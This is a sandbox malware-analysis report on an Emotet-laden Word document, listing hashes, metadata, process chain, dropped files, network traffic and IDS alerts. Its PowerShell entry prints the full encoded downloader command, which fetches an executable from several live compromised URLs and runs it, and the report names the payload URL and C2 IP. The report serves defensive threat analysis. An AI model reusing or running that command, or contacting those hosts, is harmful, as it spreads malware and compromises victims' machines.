File name: CBMP1VE 2020 9月 29.doc

Full analysis: https://app.any.run/tasks/be539105-594d-4005-8eda-ec5b35e7e376
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 30, 2020, 11:53:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
opendir
loader
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Tempora., Author: Gabriel Muller, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Sep 28 22:18:00 2020, Last Saved Time/Date: Mon Sep 28 22:18:00 2020, Number of Pages: 1, Number of Words: 3380, Number of Characters: 19268, Security: 8
MD5: DD473B5A8FDF3ADBB950D818F029B83E
SHA1: 77010693582BCE976033B07022ACB46A0002BA77
SHA256: 0383ECFDF99C78B9251B7857DDB9C66A992742CBF247AABB1A300CA9A1B4806A
SSDEEP: 1536:mxRD3bNqfNpu39IId5a6XP3Mg8afyq1Tqc380o:ER1qf69xak3MgxygqI80o

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Onj2qmzt.exe (PID: 3996)
      • api-ms-win-service-core-l1-1-0.exe (PID: 3824)
    • Connects to CnC server

      • api-ms-win-service-core-l1-1-0.exe (PID: 3824)
    • Changes the autorun value in the registry

      • api-ms-win-service-core-l1-1-0.exe (PID: 3824)
    • EMOTET was detected

      • api-ms-win-service-core-l1-1-0.exe (PID: 3824)
  • SUSPICIOUS

    • Creates files in the user directory

      • POwersheLL.exe (PID: 3136)
    • PowerShell script executed

      • POwersheLL.exe (PID: 3136)
    • Executed via WMI

      • POwersheLL.exe (PID: 3136)
    • Executable content was dropped or overwritten

      • Onj2qmzt.exe (PID: 3996)
      • POwersheLL.exe (PID: 3136)
    • Starts itself from another location

      • Onj2qmzt.exe (PID: 3996)
    • Reads Internet Cache Settings

      • api-ms-win-service-core-l1-1-0.exe (PID: 3824)
    • Connects to server without host name

      • api-ms-win-service-core-l1-1-0.exe (PID: 3824)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2560)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2560)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Tempora.
Subject: -
Author: Gabriel Muller
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:09:28 21:18:00
ModifyDate: 2020:09:28 21:18:00
Pages: 1
Words: 3380
Characters: 19268
Security: Locked for annotations
Company: -
Lines: 160
Paragraphs: 45
CharCountWithSpaces: 22603
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CodePage: Unicode UTF-16, little endian
LocaleIndicator: 1033
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
All screenshots are available in the full report
Total processes: 40
Monitored processes: 4
Malicious processes: 3
Suspicious processes: 0

Behavior graph

(Interactive graph omitted; available in the full report.) Process chain shown: winword.exe (no specs) -> start -> powershell.exe -> drop and start -> onj2qmzt.exe -> drop and start -> api-ms-win-service-core-l1-1-0.exe (#EMOTET)

Process information

PID: 2560
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\CBMP1VE 2020 9月 29.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000
3136POwersheLL -ENCOD JABNAHYAbQA5AHgAZABwAD0AKAAoACcARwB2AHkANgAnACsAJwB0ACcAKwAnAF8AJwApACsAJwA4ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUATgB2ADoAVQBzAEUAUgBwAHIATwBGAGkATABlAFwAVAA0AFkAeQBlAFIAOABcAGgASgBfAE0ARgBaAFYAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIAZQBjAHQAbwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBjAGAAVQByAGkAYABUAGAAWQBwAFIATwBgAFQATwBDAE8ATAAiACAAPQAgACgAJwB0AGwAJwArACgAJwBzACcAKwAnADEAMgAsACAAdABsAHMAJwArACcAMQAxACwAJwApACsAJwAgACcAKwAnAHQAbAAnACsAJwBzACcAKQA7ACQAQgAzAHUAbwBuAHQAMQAgAD0AIAAoACgAJwBPAG4AagAnACsAJwAyACcAKQArACgAJwBxACcAKwAnAG0AegAnACkAKwAnAHQAJwApADsAJABJAGQAdAA2ADQAZQBuAD0AKAAoACcARAA4ACcAKwAnADMAaAAnACkAKwAoACcANAAnACsAJwB1AHkAJwApACkAOwAkAFoAcgB0AG8AMwA2AGYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAYwAnACsAJwBHACcAKwAoACcATAAnACsAJwBUADQAJwApACsAKAAnAHkAJwArACcAeQBlACcAKQArACgAJwByACcAKwAnADgAYwAnACkAKwAnAEcAJwArACgAJwBMACcAKwAnAEgAagBfACcAKQArACgAJwBtACcAKwAnAGYAegB2AGMARwBMACcAKQApAC4AIgBSAGUAYABQAEwAQQBDAGUAIgAoACgAWwBDAGgAYQByAF0AOQA5ACsAWwBDAGgAYQByAF0ANwAxACsAWwBDAGgAYQByAF0ANwA2ACkALAAnAFwAJwApACkAKwAkAEIAMwB1AG8AbgB0ADEAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABJAG8AdAA1AGMAegBrAD0AKAAoACcATQAnACsAJwAzADMAcQA2ADAAJwApACsAJwBmACcAKQA7ACQATgByAG8AbQBvAGcAcgA9AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAAbgBFAFQALgB3AGUAQgBDAEwASQBFAG4AdAA7ACQARQBvADYAMQB4AGMAbwA9ACgAKAAnAGgAdAB0AHAAJwArACcAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBlACcAKwAnAGQAdQAnACsAJwAuAGoAJwArACgAJwBtAHMAJwArACcAdgAnACkAKwAoACcAYwBsAGEAcwBzAC4AYwBvAG0AJwArACcALwAnACsAJwB3AHAALQBpAG4AJwArACcAYwAnACkAKwAoACcAbAB1AGQAJwArACcAZQBzACcAKQArACcALwBzACcAKwAoACcAWgAnACsAJwBtAGoAJwApACsAKAAnAFMAcQAnACsAJwAvACoAJwArACcAaAB0ACcAKQArACcAdABwACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AJwArACcAZABhAHIAJwApACsAJwBrACcAKwAoACcAYgBsAGUAcwAnACsAJwBzACcAKQArACcAaQBuACcAKwAoACcAZwAuACcAKwAnAG4AZQAnACkAKwAoACcAdAAvAGUAJwArACcANAB3AGYAdAAnACkAKwAnAGsAJwArACcAcABuACcAKwAoACcALwBLAE4AQQBPADkALw
AqAGgAdAB0AHAAOgAvAC8AdAAnACsAJwByAGEAJwArACcAbgAnACsAJwBjAGkAJwArACcAcwAnACsAJwBjAG8AbgBzACcAKQArACgAJwB1ACcAKwAnAGwAdABpACcAKQArACcAbgBnACcAKwAnAC4AYwAnACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAcAAtAGEAJwApACsAJwBkACcAKwAoACcAbQBpAG4ALwAnACsAJwBFAEUAJwApACsAJwBvAEYAJwArACcALwAqACcAKwAoACcAaAB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBkAGUAdgBhAG4AJwArACcAeQBhAHMAJwArACcAdABvAHIAZQAnACkAKwAoACcALgBjACcAKwAnAG8AJwApACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBjAG8AJwArACcAbgAnACsAJwB0AGUAJwApACsAJwBuACcAKwAoACcAdAAvACcAKwAnADkASgA1ADYAJwApACsAJwBqAHUAJwArACcAQQAnACsAKAAnAC8AJwArACcAKgBoAHQAJwArACcAdABwACcAKQArACcAOgAvACcAKwAnAC8AaAAnACsAKAAnAGUAJwArACcAYQBsAHQAaABjAHUAJwArACcAcgBlACcAKQArACcAYQAnACsAKAAnAHQAJwArACcAaABvAG0AJwApACsAKAAnAGUALgAnACsAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBBAEwARgAnACsAJwBBAF8AJwApACsAJwBEAEEAJwArACcAVAAnACsAKAAnAEEALwAnACsAJwBpACcAKQArACgAJwBLACcAKwAnAFMAZAAnACkAKwAnAEMAJwArACgAJwBLACcAKwAnADYALwAqAGgAJwArACcAdAB0ACcAKwAnAHAAOgAnACkAKwAnAC8ALwAnACsAJwB3AHcAJwArACcAdwAnACsAJwAuAHMAJwArACgAJwB6AHcAJwArACcAeQAnACkAKwAnAG0AJwArACgAJwBhAGwAJwArACcAbAAuACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AJwApACsAKAAnAG4AdABlACcAKwAnAG4AJwArACcAdAAvACcAKQArACcAagAnACsAKAAnADIAJwArACcAOQBtACcAKQArACgAJwB2ACcAKwAnAFMALwAqAGgAdAB0ACcAKwAnAHAAOgAvACcAKQArACgAJwAvAHcAdwAnACsAJwB3AC4AJwApACsAKAAnAGoAbwByAG4AYwBvAC4AYwBvACcAKwAnAG0AJwArACcALwB3ACcAKwAnAHAAJwArACcALQAnACkAKwAnAGEAJwArACgAJwBkACcAKwAnAG0AaQBuACcAKQArACgAJwAvACcAKwAnAFUAVAAwACcAKQArACgAJwB4AEIAJwArACcASgB3AC8AJwApACkALgAiAHMAYABwAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVgBtAGwAXwA4AHIAcQA9ACgAKAAnAEgAJwArACcAeQBvACcAKQArACgAJwBkAGUAJwArACcAbAAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAQgBrAHUAXwB0AGQAXwAgAGkAbgAgACQARQBvADYAMQB4AGMAbwApAHsAdAByAHkAewAkAE4AcgBvAG0AbwBnAHIALgAiAEQAYABvAGAAdwBuAEwATwBhAGQAZgBpAGwARQAiACgAJABCAGsAdQBfAHQAZABfACwAIAAkAFoAcgB0AG8AMwA2AGYAKQA7ACQAUABuAGYAOQBmAHoAdAA9ACgAKAAnAFYAZwBvAGEAJwArACcAbgAnACkAKwAnADkAJwArACcAbQAnACkAOwBJAGYAIAAoACgALgAoACcARw
BlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAWgByAHQAbwAzADYAZgApAC4AIgBMAEUAYABOAGcAYABUAEgAIgAgAC0AZwBlACAAMgAzADIANQAzACkAIAB7AC4AKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAFoAcgB0AG8AMwA2AGYAKQA7ACQAWABvAHEAaQB5AHIANQA9ACgAKAAnAEIAdQBvACcAKwAnAGwAaAAnACkAKwAnAGkAZgAnACkAOwBiAHIAZQBhAGsAOwAkAFkANgByADUAaAAxAGUAPQAoACcAUwAnACsAJwBmACcAKwAoACcAMgBkAHEAJwArACcAZABuACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABGAG0AaQA5AGsAdgA5AD0AKAAnAEkAXwAnACsAKAAnAGQAZgBlACcAKwAnAG0AeAAnACkAKQA= C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3996
CMD: "C:\Users\admin\T4yyer8\Hj_mfzv\Onj2qmzt.exe"
Path: C:\Users\admin\T4yyer8\Hj_mfzv\Onj2qmzt.exe
Parent process: POwersheLL.exe
User: admin
Company: Intech Solutions
Integrity Level: MEDIUM
Description: MS masked edit control at the heart
Exit code: 0
Version: 2.27.0.5

PID: 3824
CMD: "C:\Users\admin\AppData\Local\mciwave\api-ms-win-service-core-l1-1-0.exe"
Path: C:\Users\admin\AppData\Local\mciwave\api-ms-win-service-core-l1-1-0.exe
Parent process: Onj2qmzt.exe
User: admin
Company: Intech Solutions
Integrity Level: MEDIUM
Description: MS masked edit control at the heart
Version: 2.27.0.5
Total events: 2 369
Read events: 1 480
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 2
Suspicious files: 2
Text files: 0
Unknown types: 3

Dropped files

PID: 2560
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVRA5E5.tmp.cvr
Type: -
MD5: -
SHA256: -

PID: 3136
Process: POwersheLL.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SDEZIX7CFU8MVAVN8QEB.temp
Type: -
MD5: -
SHA256: -

PID: 3996
Process: Onj2qmzt.exe
Filename: C:\Users\admin\AppData\Local\Temp\~DF3C37E53D27F8B920.TMP
Type: -
MD5: -
SHA256: -

PID: 2560
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5: DB7ED30F2AF244B37602E9A8FA40BC69
SHA256: 6C261EB204362985E24872BAC097DA758424FC98F9EA7C6D717C17385EC5961A

PID: 3136
Process: POwersheLL.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 4028388263805ABA00088A0BA4EEA515
SHA256: 5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948

PID: 2560
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\~$MP1VE 2020 9月 29.doc
Type: pgc
MD5: 2A1173840FD9ECF7FCA36418FFA1CC81
SHA256: 6F7377DE329E560F1FCEC679DD0B9FD77DBC6F5780A7F9A291307AA118DC801A

PID: 3996
Process: Onj2qmzt.exe
Filename: C:\Users\admin\AppData\Local\mciwave\api-ms-win-service-core-l1-1-0.exe
Type: executable
MD5: 6CA057CBBDEA55752954C8CB523BFC5A
SHA256: FEF2CD14F228CB866A39B186342C12E3DF7D80B1044E3B0A7BEF7EE81769FC29

PID: 3136
Process: POwersheLL.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bb2e5.TMP
Type: binary
MD5: 4028388263805ABA00088A0BA4EEA515
SHA256: 5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948

PID: 2560
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
Type: tlb
MD5: 50742E65DB2DB0C410E463BA85DDEA0D
SHA256: 89FA0F5B2B5D869A591A26C889892D907BC5FB39D632825174BC4378853A31DA

PID: 3136
Process: POwersheLL.exe
Filename: C:\Users\admin\T4yyer8\Hj_mfzv\Onj2qmzt.exe
Type: executable
MD5: 6CA057CBBDEA55752954C8CB523BFC5A
SHA256: FEF2CD14F228CB866A39B186342C12E3DF7D80B1044E3B0A7BEF7EE81769FC29
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 2
TCP/UDP connections: 2
DNS requests: 1
Threats: 0

HTTP requests

PID: 3824
Process: api-ms-win-service-core-l1-1-0.exe
Method: POST
HTTP Code: 200
IP: 104.193.103.61:80
URL: http://104.193.103.61/ibdq/KbaGIbDna0SgKqeW/eqoEwvGnvKXZ/
CN: US
Type: binary
Size: 132 b
Reputation: malicious

PID: 3136
Process: POwersheLL.exe
Method: GET
HTTP Code: 200
IP: 160.153.210.213:80
URL: http://edu.jmsvclass.com/wp-includes/sZmjSq/
CN: US
Type: executable
Size: 332 Kb
Reputation: suspicious

Connections

PID: 3136
Process: POwersheLL.exe
IP: 160.153.210.213:80
Domain: edu.jmsvclass.com
ASN: GoDaddy.com, LLC
CN: US
Reputation: suspicious

PID: 3824
Process: api-ms-win-service-core-l1-1-0.exe
IP: 104.193.103.61:80
Domain: -
ASN: Delcom, Inc.
CN: US
Reputation: malicious

DNS requests

Domain: edu.jmsvclass.com
IP: 160.153.210.213
Reputation: suspicious

Threats

PID: 3136
Process: POwersheLL.exe
Class: A Network Trojan was detected
Message: ET POLICY Terse Named Filename EXE Download - Possibly Hostile

PID: 3136
Process: POwersheLL.exe
Class: Potential Corporate Privacy Violation
Message: ET POLICY PE EXE or DLL Windows file download HTTP

PID: 3136
Process: POwersheLL.exe
Class: Potentially Bad Traffic
Message: ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download

PID: 3136
Process: POwersheLL.exe
Class: Misc activity
Message: ET INFO EXE - Served Attached HTTP

PID: 3824
Process: api-ms-win-service-core-l1-1-0.exe
Class: A Network Trojan was detected
Message: ET TROJAN Win32/Emotet CnC Activity (POST) M10
No debug info